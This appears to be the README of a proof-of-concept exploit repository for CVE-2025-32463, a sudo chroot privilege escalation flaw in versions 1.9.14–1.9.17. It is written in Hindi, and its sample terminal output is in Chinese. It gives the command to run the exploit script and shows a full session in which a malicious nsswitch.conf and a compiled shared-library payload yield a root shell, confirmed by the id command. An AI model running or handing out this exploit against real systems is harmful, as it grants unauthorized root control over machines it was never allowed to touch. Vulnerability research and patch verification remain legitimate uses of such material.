
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2025-32463 के लिए, जो संस्करण 1.9.14-1.9.17 में एक sudo chroot कमजोरी है। यह एक विशेष रूप से निर्मित साझा लाइब्रेरी और chroot वातावरण के माध्यम से रूट तक विशेषाधिकार वृद्धि को स्वचालित करता है।
प्रभावित संस्करण 1.9.14 से 1.9.17
bash run.sh
सफलता निम्नानुसार है
neko@aosc-neko205 [ CVE-2025-32463_Exploit@main ] $ bash run.sh
[+] CVE-2025-32463 Sudo chroot 漏洞复现脚本
[*] 正在创建临时工作目录...
[*] 工作目录已创建: /tmp/sudo_exploit.nc0EjT
[*] 正在创建 C 语言 payload (woot1337.c)...
[*] 正在设置 chroot 环境和恶意的 nsswitch.conf...
[*] 正在将 payload 编译为共享库 (libnss_/woot1337.so.2)...
[*] 编译成功!
[+] root shell!!!!!
woot!
root@aosc-neko205 [ / ] # id
uid=0(root) gid=0(root) 组=0(root),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1001(neko),1002(gamemode)
root@aosc-neko205 [ / ] # exit